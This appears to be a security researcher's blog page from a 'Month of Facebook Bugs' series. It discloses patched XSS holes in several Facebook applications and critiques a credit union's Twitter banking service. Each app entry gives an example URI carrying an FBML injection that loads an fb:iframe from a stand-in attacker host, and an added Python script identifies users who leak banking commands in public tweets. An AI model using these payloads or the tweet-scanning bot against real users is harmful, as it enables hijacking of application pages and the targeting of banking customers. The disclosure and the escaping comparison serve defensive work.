FAXX Hack: YoVille

We’ve come to the end of the Month of Facebook Bugs: today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied back quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F


FAXX Hack: Hug Me

Current Monthly Active Users: 3,157,995

Current Rank on Application Leaderboard: 55

Application Developer: RockYou

Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.

Vulnerability Status: Patched Sep. 30 (originally listed as Unpatched)

Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E


Should you use Twitter for Online Banking?

Today, a credit union in St. Louis, MO called Vantage Credit Union announced that it is offering a service through Twitter called tweetMyMoney to conduct online banking. According to the FAQ on the bank’s website, banking credentials, PINs and account information are not passed through the direct messages sent to the @myvcu Twitter account, only commands to get account balances, recent transactions, etc.

However, there are a few potential security issues/concerns with this type of service. While it seems that VCU has built this system with good intentions, most of these concerns center on the fact that you are submitting requests for account information, and even transferring money to other accounts, through Twitter, a third-party service not owned or managed by the bank.

  • Plain and simple, Twitter is a third-party service. When you send a direct message (DM) to another Twitter user, the message is stored on Twitter’s servers, not the bank’s; the bank is simply retrieving it. You should never have any expectation of privacy for DMs *at all*. Sure, they are “private” to you and the user you send them to, but think about who on Twitter’s end might be able to view them. Remember, security at Twitter is not a high priority right now, as we have seen several times in very recent history.
  • What about a local man-in-the-middle attack, where someone sniffing your network traffic could read or modify your banking requests? A simple attack like this could easily compromise the user’s Twitter account. And people like to reuse user IDs and passwords; we all know where that leads. I am not sure whether VCU uses any form of two-factor authentication for its online banking application, so a login ID and password captured this way may be all that is needed to get into the online banking account. Again, I am not sure this is the case with VCU, but yes, some banks are still using single-factor authentication!
  • How about the security of the @myvcu Twitter account you send your direct messages to? Attackers *will* target this account; it’s only a matter of time. You are trusting that the folks at VCU are properly securing it and that there are no vulnerabilities or exploits on the Twitter site that could compromise it. It also looks like this account is used for communicating with customers, so its credentials could be phished and/or compromised through multiple avenues of attack.
  • I question the correspondence authentication codes they have put in place. Relying on the user to change these multiple codes is an interesting choice; I could see them being spoofed quite easily.
  • Lastly, the users of this system could also be targeted if, say, a user accidentally tweeted something like “#l5d 7” to their followers instead of sending it by DM (known as a #dmfail). Attackers can easily script a bot to look for these patterns and target those users.
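The #dmfail bot described in the last point, as an added example that is not part of the original post and not anything VCU or Twitter publishes. The command grammar it looks for is an assumption based on the single example the post gives (“#l5d 7”): a short hashtag code, optionally followed by a number, making up the whole tweet, possibly with a botched “d myvcu” direct-message prefix in front of it. The tweets it scans are constructed; the only account name taken from the post is @myvcu.

```python
import re

# Constructed sample of public tweets (not real accounts or messages). The command
# grammar is assumed from the one example the post gives ("#l5d 7"); the real
# tweetMyMoney command set is not on the page.
SAMPLE_TWEETS = [
    ("alice", "dmyvcu #l5d 7"),                                   # classic #dmfail: the space after "d" was dropped
    ("bob", "#l5d 7"),                                            # bare command sent as a public tweet
    ("carol", "loving the new #l5d feature at my credit union"),  # a code mentioned in prose: not a command
    ("dave", "#b"),                                               # command without an argument
    ("erin", "@myvcu thanks for the quick reply!"),               # ordinary public mention of the bank
    ("alice", "oops #dmfail"),                                    # the user noticed; still no command here
]

# A public tweet consisting of nothing but a command (optionally preceded by a
# mistyped "d myvcu" DM prefix) is treated as a leaked banking command. Requiring
# the whole tweet to match keeps prose that merely mentions a code out of the results.
LEAKED_COMMAND = re.compile(
    r"^(?:d\s*myvcu\s+)?#(?P<code>[a-z0-9]{1,4})(?:\s+(?P<arg>\d+))?\s*$", re.I
)


def find_dmfails(tweets):
    """Return (user, code, arg) for every public tweet that looks like a leaked command."""
    leaks = []
    for user, text in tweets:
        m = LEAKED_COMMAND.match(text.strip())
        if m:
            leaks.append((user, m.group("code").lower(), m.group("arg")))
    return leaks


def targets(tweets):
    """The set of users an attacker's bot would queue for follow-on targeting."""
    return {user for user, _, _ in find_dmfails(tweets)}


if __name__ == "__main__":
    for user, code, arg in find_dmfails(SAMPLE_TWEETS):
        print("%s leaked command #%s %s" % (user, code, arg or ""))
```

The point of the whole-tweet match is precision: a bot that fired on every tweet containing “#l5d” would drown in chatter about the service, while one that fires only on a tweet that *is* a command finds exactly the users who confused a public tweet with a DM.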

I don’t want to knock the folks at VCU, as it seems they are a very “progressive” bank that wants to push the envelope of new technology. My opinion is simply that there are too many points of security “fail” in this system. Potential failures in the Twitter service, in the @myvcu account and in the Twitter accounts of VCU’s users, in addition to the third-party privacy concerns, all make for something you shouldn’t be trusting your online banking to. Social networks are not for online banking in any form…srsly.

Thanks to @rogueclown and @nickhacks for the tweets and comments about this new service.

FAXX Hack: Dogbook

Current Monthly Active Users: 711,503

Current Rank on Application Leaderboard: 159

Application Developer: Poolhouse

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: myFarm

(This counts as Sunday’s FAXX Hack.)

Current Monthly Active Users: 945,452

Current Rank on Application Leaderboard: 121

Application Developer: playSocial & take(5)social

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: People I Love!

Current Monthly Active Users: 986,796

Current Rank on Application Leaderboard: 119

Application Developer: Chad Morovitz

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1


FAXX Hack: Photos I Love!

Current Monthly Active Users: 1,100,267

Current Rank on Application Leaderboard: 113

Application Developer: PhotosILove

Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer got in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E
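Every example URI in the FAXX Hack posts on this page works the same way: a query parameter is echoed unescaped into the application’s FBML canvas page, so a value beginning with `"/>` closes the attribute and element it lands in and the rest of the value, an fb:iframe tag pointing at an attacker-controlled host, is rendered by Facebook as part of the application. What follows is an added example, not code from the posts or from any of the affected applications. It decodes the posts’ own URIs (the EVILURI/eviluri placeholders are the posts’, not real hosts), reports which parameter carries FBML, and contrasts a hypothetical vulnerable form field with the HTML-escaped version that closes the hole; the form template and the variable names are assumptions for illustration. The YoVille payload carries part of its markup double-encoded, and after a single decode it already contains a literal fb:iframe, which is what the scanner reports.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Example URIs copied from the FAXX Hack posts on this page. EVILURI / eviluri are
# the posts' own placeholders for an attacker-controlled host; no real host is assumed.
EXAMPLE_URIS = {
    "YoVille": "http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F",
    "Hug Me": "http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E",
    "Dogbook": "http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E",
    "Death's Time": "http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E",
}

# Any FBML element (fb:iframe, fb:swf, ...) appearing as a literal tag in a string.
FBML_TAG = re.compile(r"<(fb:[a-z]+)", re.I)


def fbml_tags(markup):
    """Names of the FBML tags present as literal markup in a string."""
    return [t.lower() for t in FBML_TAG.findall(markup)]


def injected_fbml(uri):
    """Map each query parameter whose decoded value carries FBML to the tags it carries.

    parse_qs performs the percent- and plus-decoding the application's web server
    performs before the script sees the value, so what is inspected here is what
    the script would have echoed into the page.
    """
    found = {}
    for param, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        tags = [t for v in values for t in fbml_tags(v)]
        if tags:
            found[param] = tags
    return found


def render_vulnerable(name):
    """Hypothetical search form in the style of the affected apps (not any app's real
    code): the parameter is echoed straight into an attribute of the canvas page."""
    return '<input type="text" name="name" value="%s"/>' % name


def render_hardened(name):
    """Same form with the value HTML-escaped: quotes and angle brackets become
    entities, so the attacker's "/> can no longer close the attribute and element
    and the fb:iframe stays inert text."""
    return '<input type="text" name="name" value="%s"/>' % html.escape(name, quote=True)


if __name__ == "__main__":
    for app, uri in EXAMPLE_URIS.items():
        print("%-13s %s" % (app, injected_fbml(uri)))
    payload = parse_qs(urlsplit(EXAMPLE_URIS["Dogbook"]).query)["name"][0]
    print(render_vulnerable(payload))  # the fb:iframe lands in the page
    print(render_hardened(payload))    # the same value, now harmless
```

The Death’s Time payload shows why the breakout string is context-specific: its parameter is echoed inside an anchor inside a paragraph, so the value also emits `</a></p>` before the fb:iframe. Escaping at output time, as in `render_hardened`, fixes every one of these cases regardless of context, whereas a blacklist of particular strings would not.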

